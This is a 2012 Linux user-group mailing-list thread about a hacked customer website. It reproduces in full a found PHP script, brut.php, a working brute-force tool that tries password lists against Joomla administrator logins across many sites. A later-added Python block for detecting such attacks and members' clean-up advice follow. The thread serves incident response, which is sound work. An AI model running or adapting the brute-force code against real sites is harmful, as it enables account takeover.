[SLUG] Customer site hacked with brut.php - what to do?


David Lyon

Aug 21, 2012, 10:00:09 PM
to SLUG
I have a customer with a hacked website.

When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):

How did the hacker put it on my system? What could it have compromised?
What can I do to stop further consequences?

--- brut.php (don't run this) ---

<body bgcolor="#808080">

<p align="center"><b><font size="5" color="#FFFFFF">#&nbsp; GaStRo
-Dz&nbsp;&nbsp; #</font></b></p>
<p align="center"><b><font color="#FFFFFF">Joomla Speed Brute
Force</font></b></p>
<form method="post" action="" enctype="multipart/form-data">
<p align="center"><b><font color="#FFFFFF">Username</font></b><font
color="#FFFFFF">:
<input type="text" name="usr" value='admin' size="28"> <b>Ex: Admin ;
administrator</b></font></p>
<p align="center"><font color="#FFFFFF">in , administrator , ..<br>
</font><b><font color="#FFFFFF">sites list:</font></b><font
color="#FFFFFF">
<input type="file" name="sites" size="34"></font></p>
<p align="center"><font color="#FFFFFF"><br>
</font><b><font color="#FFFFFF">Pass list</font></b><font color="#FFFFFF">
<input type="file" name="w0rds" size="35"></font></p>
<p align="center"><font color="#FFFFFF"><br>
<input type="submit" name="x" value="Start!">
</font></p>
</form>
<p align="center"><font color="#FFFFFF"><b><a href="http://Www.sec4ever.com
">
<font color="#FFFFFF">Www.sec4ever.com</font></a> <span
lang="ar-dz">|</span>
<a href="http://Www.gastro-dz.net"><font color="#FFFFFF">Www.gastro-dz.net
</font></a>
</b></font></p>
<p align="center"><b><font color="#FFFFFF">GreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi - Al l
Dz Hackerz Team</font></b></p>
<p align="center">&nbsp;</p>

<?
@set_time_limit(0);
# joomla brute force
# Coded by Gastro
#Devloped by Gastro

if($_POST['x']){

echo "<hr>";

$sites = explode("\n",file_get_contents($_FILES["sites"]["tmp_name"])); // Get Sites !

$w0rds = explode("\n",file_get_contents($_FILES["w0rds"]["tmp_name"])); // Get w0rdLiSt !

$Attack = new Joomla_brute_Force(); // Active Class

foreach($w0rds as $pwd){

foreach($sites as $site){

$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}

}

}


# Class & Function'z

function txt_cln($value){ return str_replace(array("\n","\r"),"",$value);
}

class Joomla_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('com_config',$this->post($site,$user,$pass))){

echo "<b># login successful : $user:$pass -> $site</b><BR>";
$f = fopen("j0s_result.txt","a+"); fwrite($f , "$user:$pass -> $site\n");
fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}

}

public function post($site,$user,$pass){ // Post -> user & pass

$token = $this->extract_token($site);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');

curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for -> function post

$source = $this->get_source($site);

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"
,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for -> function extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}

?>
--
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
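Two defender-side checks suggested by the listing above, written for this thread and not part of David's post: a scan for the markers brut.php leaves in a PHP file (eregi(), curl_init() against /administrator/index.php, the j0s_result.txt output file), and a pass over an Apache access log for the burst of POSTs to the Joomla admin login that such a tool produces when a site is one of its targets. The log lines are constructed; the thresholds and log format are assumptions.

```python
# Triage helpers written for this thread; not code from the original post.
# Derived from the brut.php listing: it calls eregi(), POSTs to /administrator/index.php
# via curl, and appends hits to j0s_result.txt. Sample inputs are constructed.
import re
from collections import defaultdict
from datetime import datetime

# Markers lifted from brut.php; two or more in one PHP file is worth a closer look.
MARKERS = ("eregi(", "curl_init(", "/administrator/index.php",
           "j0s_result.txt", "set_time_limit(0)")

def suspicious_markers(php_source):
    """Return the brut.php-style markers found in a PHP file's source text."""
    return [m for m in MARKERS if m in php_source]

# Apache combined-log prefix: client IP, timestamp, request line, status (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Parse one access-log line into (ip, datetime, method, path, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def brute_force_sources(log_lines, threshold=5, window_s=60):
    """Map IP -> total admin-login POSTs, for IPs that sent >= threshold POSTs to
    /administrator/index.php inside any window_s-second window."""
    per_ip = defaultdict(list)
    for line in log_lines:
        p = parse_line(line)
        if p and p[2] == "POST" and p[3].startswith("/administrator/index.php"):
            per_ip[p[0]].append(p[1])
    hits = {}
    for ip, times in per_ip.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                hits[ip] = len(times)
                break
    return hits

# Constructed sample: one host hammering the admin login every 2 s, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Aug/2012:12:00:%02d +1000] "POST /administrator/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"' % s
    for s in range(0, 12, 2)
] + ['198.51.100.5 - - [22/Aug/2012:12:03:10 +1000] "GET /index.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
     '198.51.100.5 - - [22/Aug/2012:12:03:40 +1000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"']

if __name__ == "__main__":
    print(brute_force_sources(SAMPLE_LOG))  # {'203.0.113.7': 6}
```

Run the marker check over every .php file under the webroot and the log check over the access log for the days around the compromise; a single legitimate admin login does not trip the threshold.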

Mark Walkom

Aug 21, 2012, 10:54:49 PM
to SLUG
On 22 August 2012 12:00, David Lyon <david.lyon...@gmail.com> wrote:

> I have a customer with a hacked website.
>
> When I ftp'd to their web-server I found this wart (listed below - saved as
> brut.php):
>
> How did the hacker put it on my system? What could it have compromised?
> What can I do to stop further consequences?
>
>
Reset any management/admin passwords to be safe. Make sure everything
running on the server is up to date - OS, DB, Apache etc.

Get rid of FTP, use SCP and fail2ban.

Robert Collins

Aug 22, 2012, 2:27:27 AM
to Mark Walkom, SLUG
On Wed, Aug 22, 2012 at 2:54 PM, Mark Walkom <markw...@gmail.com> wrote:
> On 22 August 2012 12:00, David Lyon <david.lyon...@gmail.com> wrote:
>
>> I have a customer with a hacked website.
>>
>> When I ftp'd to their web-server I found this wart (listed below - saved as
>> brut.php):
>>
>> How did the hacker put it on my system? What could it have compromised?
>> What can I do to stop further consequences?
>>
>>
> Reset any management/admin passwords to be safe. Make sure everything
> running on the server is up to date - OS, DB, Apache etc.
>
> Get rid of FTP, use SCP and fail2ban.

Reinstall the machine from bare metal. Verify the BIOS against the
vendor's version (not 100% foolproof) and discard the filesystem
entirely (take a backup first).

You don't know what has been altered; it's not impossible they got
root, and it's not impossible that they put a preboot attack in place
too.

-Rob

David Lyon

Aug 22, 2012, 2:36:49 AM
to SLUG
I have changed the password on the hosting account.

It won't be possible to reload everything else
because it is an ISP hosted machine.